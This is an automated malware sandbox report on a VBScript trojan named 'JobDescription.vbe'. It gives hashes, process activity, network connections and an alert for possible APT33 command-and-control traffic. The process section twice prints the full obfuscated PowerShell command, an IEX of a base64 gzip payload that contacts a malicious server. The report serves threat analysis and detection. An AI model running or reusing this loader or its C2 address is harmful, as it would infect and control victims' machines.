analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

JobDescription.vbe

Full analysis: https://app.any.run/tasks/bf673e9d-01f9-461d-970a-c975e3d49e1a
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: November 16, 2019, 21:14:55
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: application/octet-stream
File info: data
MD5:

7C295C528FEA9385A2E3165B683D1A46

SHA1:

982DCA0FD4EC79EBA19DD069CA1EF61962CD3F49

SHA256:

92E66ACD62DFB1632F6E4CCB90A343CB8B8E2F4FB7C9BFA9AE0745DB0748223B

SSDEEP:

96:8dTZWELuApueA4dNJ50N6hO8eBgro6MWJ7u7WVYkvv4RldlkbLFo:8FUEJA4dNJ50khxM87uWVYkvvYldOFo

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2064)

    • Connects to CnC server

      • powershell.exe (PID: 1560)

  • SUSPICIOUS

    • Executed via COM

      • iexplore.exe (PID: 1536)
      • FlashUtil32_26_0_0_131_ActiveX.exe (PID: 1820)

    • Creates files in the user directory

      • powershell.exe (PID: 1560)
      • notepad++.exe (PID: 2248)

    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2176)

  • INFO

    • Application launched itself

      • iexplore.exe (PID: 1536)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2536)
      • iexplore.exe (PID: 1252)
      • iexplore.exe (PID: 1536)
      • iexplore.exe (PID: 2140)

    • Reads internet explorer settings

      • iexplore.exe (PID: 1252)
      • iexplore.exe (PID: 2140)

    • Changes internet zones settings

      • iexplore.exe (PID: 1536)

    • Reads settings of System Certificates

      • powershell.exe (PID: 1560)

    • Changes settings of System certificates

      • iexplore.exe (PID: 1536)

    • Manual execution by user

      • notepad++.exe (PID: 2248)
      • notepad++.exe (PID: 4024)

    • Creates files in the user directory

      • iexplore.exe (PID: 2140)
      • FlashUtil32_26_0_0_131_ActiveX.exe (PID: 1820)

    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 1536)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.vbe | VBScript Encoded script (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
53
Monitored processes
11
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe iexplore.exe iexplore.exe no specs iexplore.exe no specs cmd.exe no specs powershell.exe notepad++.exe gup.exe iexplore.exe flashutil32_26_0_0_131_activex.exe no specs notepad++.exe

Process information

PID
CMD
Path
Indicators
Parent process
2176"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\JobDescription.vbe"C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1536"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2536"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1536 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1252"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1536 CREDAT:14337C:\Program Files\Internet Explorer\iexplore.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2064cmd /c powershell /w 1 IEX(New-Object IO.StreamReader((New-Object System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String('H4sIAJ0RyV0C/51WW3PaOhB+96/QePyAWyxugbRheCAOadKEhAM0nTaTOSPsBVSM5cpyCOHw38/KNpekTdJzMnlAq719u592fTtYxgrm9AoUHYC85x70BA9Vl4VsAvLu6EhLQbogFR9zjym4YQH3meIidFkQjJg3Iy2yspRMYG1Ysdcyp0pF8VGpVK3UaLV6SCv1Oq3Wjw4OaiYqvHZfGrERBE4kguWYB0GpQWu0clAyjXESejokcdtdUrBmsCxa5zf2ylByicEZpnAFC+d69AM8Rcwc1QC8RHK1pK5cRkpMJIumS9rnP0KfQZBh9E1jTRCXN/2vftoQZ+dN4aS45z5IE8vAaFf4gN5uX3Xh8mgKUqtipd1jVxv2mO/zcPKmba6XG38HKWJtfhwIbzbgjzp4pfpBiy5gmQuq9YbBx1hArJ2x2vykE1DDZQQFm16xORAHfiJ0JdG7iWro4fxmLx1XhMgIhUFPpZgfsxgaB5l26ndtQBDDzgxla2OdxcK+bePi77cDY+p/GFm73gudGWqpDm6x9Y5CnSt3Q6EkRApZo70QQ3hQtBN6QtcWA30Znn6gn0AdLxXEBW1gpCzRPNQ+DEvXFQO6EvBxoGXaI1lAvbG+ATqULIzHQs5PeciCtD8Fa1Qk5SKxRvQSwoma2sbtCCPc3t0RK8ocYvHeE2ts/Ap+KJ5Cj2xjD95JZwsPQu85vtdKqNUNK2va6LZM8WHePUWrm2lY/j7iE9hDnOgb/0XElcYeZOLg2TbeKvwmucTew4hy5yuMvIBDqBCtK8SMg01WWXIFfX+CyRHnFLNg+JJ9v9Ttlpb4Z9rNTOsWpxgoPtfPp8dkDJ0H5qmC5Rf3tYtWmASBtpm9bGNWqiX8r5YrH83fW2eUJ06gsECYKDxwhbxMYpChpn6LmDgcIxbHCyH9zVGKh2Uig/y48J6Op73ZjcVw02I0DcOatlA7DYhFZqFPCsiRGNseY+0UGwVA3cv+TXamXfZDSOJMFKnaNmaGYegZMBxkMW37fsE8E7FCINP8efEx+rVXOOklj9TR3jy39MVLI7y5NfCeWeh5+TzmF6yL054gIKxnVzyiJ1aq0zIpfOWhLxYxuRqSSpmWmwQFjYMmeWgc2KQdRQFgLS64KtVrh7TWIIWLs2H3skgCPgPkjTcTNnGnyH0oHTZomdY+lD/SSrlMBmzMJM/NcPz8klMfxiBxvBdNvE3Lu+lPSrxF9Fp3elp1Z1FM9+WGF1sWpN3asiB12xsM9APMnu1QOOkygOxV7FSJ0457AeOhfkYp6z1AyuJ89ST4MXoIMTORZRZnmc3T/TfHGlOWKDFPdzrtDfBd+yjkLCDbzIo6j6YGSXfX2u02RBPXqKYHWRFdOWzgCYxZEqhn+hp3k2QtT4uihYsIRbm58bb5zvh5Nijfk+ic0gJ7m/lAnnf1dq9NZ8jKPvxMIFaZil7KqWUR1xLE+rmcn7TyaWPaGQqyN5ciiaNBagxe8rsF3sOueTxiAc1pfJ6mqpYYCWeWm0iJZz1JX2DTy562AkSb6CU1+aMEjhMeqPOwLwI90tr+nIc8VpLhQM+4iR0/jzOFAjq18eVD0DLfmWvdruyALxi/w1ZW0kqDU82Y93iTf1itUkcQ3h/tiK43vZUJPTGPEpVd2JZpr3LPSeuJzRqrLVrmVuYjY3nYtJLmL14ySa9/7XYGg+v+3+2+e3Y+7LjDL/1O04q433ztEzX7pIyiFu5D4uitd1iNP8/mwfzg0/fltwU8fvs5a/SHl8n08bOML+4rlb8uknq7Ep4OvRZxkpBYYvdNiY7MTr9/3ddzLidIvqJ2K8zJOIUPOrIp9iUMBPPjfPXF2E5NBx/+Vz4aRh44H1u4hvQ0NN+hs3emnvnRP4TDg/5UStFn2lsMa2OgmFTOIACISK1c/gOtxota/wJs3EOYdAwAAA=='),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1560powershell /w 1 IEX(New-Object IO.StreamReader((New-Object System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String('H4sIAJ0RyV0C/51WW3PaOhB+96/QePyAWyxugbRheCAOadKEhAM0nTaTOSPsBVSM5cpyCOHw38/KNpekTdJzMnlAq719u592fTtYxgrm9AoUHYC85x70BA9Vl4VsAvLu6EhLQbogFR9zjym4YQH3meIidFkQjJg3Iy2yspRMYG1Ysdcyp0pF8VGpVK3UaLV6SCv1Oq3Wjw4OaiYqvHZfGrERBE4kguWYB0GpQWu0clAyjXESejokcdtdUrBmsCxa5zf2ylByicEZpnAFC+d69AM8Rcwc1QC8RHK1pK5cRkpMJIumS9rnP0KfQZBh9E1jTRCXN/2vftoQZ+dN4aS45z5IE8vAaFf4gN5uX3Xh8mgKUqtipd1jVxv2mO/zcPKmba6XG38HKWJtfhwIbzbgjzp4pfpBiy5gmQuq9YbBx1hArJ2x2vykE1DDZQQFm16xORAHfiJ0JdG7iWro4fxmLx1XhMgIhUFPpZgfsxgaB5l26ndtQBDDzgxla2OdxcK+bePi77cDY+p/GFm73gudGWqpDm6x9Y5CnSt3Q6EkRApZo70QQ3hQtBN6QtcWA30Znn6gn0AdLxXEBW1gpCzRPNQ+DEvXFQO6EvBxoGXaI1lAvbG+ATqULIzHQs5PeciCtD8Fa1Qk5SKxRvQSwoma2sbtCCPc3t0RK8ocYvHeE2ts/Ap+KJ5Cj2xjD95JZwsPQu85vtdKqNUNK2va6LZM8WHePUWrm2lY/j7iE9hDnOgb/0XElcYeZOLg2TbeKvwmucTew4hy5yuMvIBDqBCtK8SMg01WWXIFfX+CyRHnFLNg+JJ9v9Ttlpb4Z9rNTOsWpxgoPtfPp8dkDJ0H5qmC5Rf3tYtWmASBtpm9bGNWqiX8r5YrH83fW2eUJ06gsECYKDxwhbxMYpChpn6LmDgcIxbHCyH9zVGKh2Uig/y48J6Op73ZjcVw02I0DcOatlA7DYhFZqFPCsiRGNseY+0UGwVA3cv+TXamXfZDSOJMFKnaNmaGYegZMBxkMW37fsE8E7FCINP8efEx+rVXOOklj9TR3jy39MVLI7y5NfCeWeh5+TzmF6yL054gIKxnVzyiJ1aq0zIpfOWhLxYxuRqSSpmWmwQFjYMmeWgc2KQdRQFgLS64KtVrh7TWIIWLs2H3skgCPgPkjTcTNnGnyH0oHTZomdY+lD/SSrlMBmzMJM/NcPz8klMfxiBxvBdNvE3Lu+lPSrxF9Fp3elp1Z1FM9+WGF1sWpN3asiB12xsM9APMnu1QOOkygOxV7FSJ0457AeOhfkYp6z1AyuJ89ST4MXoIMTORZRZnmc3T/TfHGlOWKDFPdzrtDfBd+yjkLCDbzIo6j6YGSXfX2u02RBPXqKYHWRFdOWzgCYxZEqhn+hp3k2QtT4uihYsIRbm58bb5zvh5Nijfk+ic0gJ7m/lAnnf1dq9NZ8jKPvxMIFaZil7KqWUR1xLE+rmcn7TyaWPaGQqyN5ciiaNBagxe8rsF3sOueTxiAc1pfJ6mqpYYCWeWm0iJZz1JX2DTy562AkSb6CU1+aMEjhMeqPOwLwI90tr+nIc8VpLhQM+4iR0/jzOFAjq18eVD0DLfmWvdruyALxi/w1ZW0kqDU82Y93iTf1itUkcQ3h/tiK43vZUJPTGPEpVd2JZpr3LPSeuJzRqrLVrmVuYjY3nYtJLmL14ySa9/7XYGg+v+3+2+e3Y+7LjDL/1O04q433ztEzX7pIyiFu5D4uitd1iNP8/mwfzg0/fltwU8fvs5a/SHl8n08bOML+4rlb8uknq7Ep4OvRZxkpBYYvdNiY7MTr9/3ddzLidIvqJ2K8zJOIUPOrIp9iUMBPPjfPXF2E5NBx/+Vz4aRh44H1u4hvQ0NN+hs3emnvnRP4TDg/5UStFn2lsMa2OgmFTOIACISK1c/gOtxota/wJs3EOYdAwAAA=='),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2248"C:\Program Files\Notepad++\notepad++.exe" "C:\Users\Public\Downloads\JobDetails.htm"C:\Program Files\Notepad++\notepad++.exe
explorer.exe
User:
admin
Company:
Don HO [email protected]
Integrity Level:
MEDIUM
Description:
Notepad++ : a free (GNU) source code editor
Version:
7.51
2764"C:\Program Files\Notepad++\updater\gup.exe" -v7.51C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe
User:
admin
Company:
Don HO [email protected]
Integrity Level:
MEDIUM
Description:
GUP : a free (LGPL) Generic Updater
Exit code:
0
Version:
4.1
2140"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1536 CREDAT:71944C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1820C:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exe -EmbeddingC:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exesvchost.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe® Flash® Player Installer/Uninstaller 26.0 r0
Version:
26,0,0,131
Total events
1 767
Read events
1 429
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
8
Text files
38
Unknown types
8

Dropped files

PID
Process
Filename
Type
1536iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\favicon[1].ico
MD5:
SHA256:
1536iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
1536iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFBEF7E1949480EC1B.TMP
MD5:
SHA256:
1560powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LUCTIUROVIJ4Y5QW6WRP.temp
MD5:
SHA256:
2140iexplore.exeC:\Users\admin\AppData\Local\Temp\Low\Cab69C7.tmp
MD5:
SHA256:
2140iexplore.exeC:\Users\admin\AppData\Local\Temp\Low\Tar69C8.tmp
MD5:
SHA256:
2140iexplore.exeC:\Users\admin\AppData\Local\Temp\Low\Cab69D8.tmp
MD5:
SHA256:
2140iexplore.exeC:\Users\admin\AppData\Local\Temp\Low\Tar69D9.tmp
MD5:
SHA256:
2176WScript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\site[1].htmxml
MD5:1EC6FFFB4E8C534D4AA251AFF3D425CD
SHA256:2994FE08924EEB28852EFE9C240FBA3C6719E1E4C38D127CDCAAEACE601E300A
2176WScript.exeC:\users\public\downloads\JobDetails.htmxml
MD5:1EC6FFFB4E8C534D4AA251AFF3D425CD
SHA256:2994FE08924EEB28852EFE9C240FBA3C6719E1E4C38D127CDCAAEACE601E300A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
21
DNS requests
13
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2176
WScript.exe
GET
200
213.227.155.25:80
http://213.227.155.25/site.htm
NL
xml
9.29 Kb
malicious
GET
200
72.21.91.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA%2Fz5hY5qj0aEmX0H4s05bY%3D
US
der
1.47 Kb
whitelisted
2140
iexplore.exe
GET
200
143.204.208.196:80
http://x.ss2.us/x.cer
US
der
1.27 Kb
whitelisted
1536
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
2140
iexplore.exe
GET
200
8.248.119.254:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
US
compressed
57.4 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1536
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2176
WScript.exe
213.227.155.25:80
LeaseWeb Netherlands B.V.
NL
malicious
1560
powershell.exe
213.227.155.25:443
LeaseWeb Netherlands B.V.
NL
malicious
72.21.91.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
2140
iexplore.exe
13.35.253.5:443
dyncorp.jobs.net
US
whitelisted
2764
gup.exe
104.31.88.28:443
notepad-plus-plus.org
Cloudflare Inc
US
shared
2140
iexplore.exe
143.204.208.196:80
x.ss2.us
US
malicious
2140
iexplore.exe
172.217.18.110:443
apis.google.com
Google Inc.
US
whitelisted
2140
iexplore.exe
216.58.205.238:443
www.google-analytics.com
Google Inc.
US
whitelisted
2140
iexplore.exe
216.58.208.42:443
maps.googleapis.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
notepad-plus-plus.org
  • 104.31.88.28
  • 104.31.89.28
whitelisted
ocsp.digicert.com
  • 72.21.91.29
whitelisted
dyncorp.jobs.net
  • 13.35.253.5
  • 13.35.253.25
  • 13.35.253.88
  • 13.35.253.53
whitelisted
x.ss2.us
  • 143.204.208.196
  • 143.204.208.42
  • 143.204.208.222
  • 143.204.208.228
whitelisted
www.download.windowsupdate.com
  • 8.248.119.254
  • 8.248.117.254
  • 67.26.137.254
  • 8.253.95.249
  • 8.253.95.120
whitelisted
www.dropbox.com
  • 162.125.66.1
shared
apis.google.com
  • 172.217.18.110
whitelisted
maps.googleapis.com
  • 216.58.208.42
whitelisted
www.googletagmanager.com
  • 172.217.16.136
whitelisted

Threats

PID
Process
Class
Message
1560
powershell.exe
A Network Trojan was detected
ET TROJAN Observed Malicious SSL Cert (Possible APT33 CnC)
Process
Message
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
42C4C5846BB675C74E2B2C90C69AB44366401093
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
42C4C5846BB675C74E2B2C90C69AB44366401093
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
JobDescription.vbe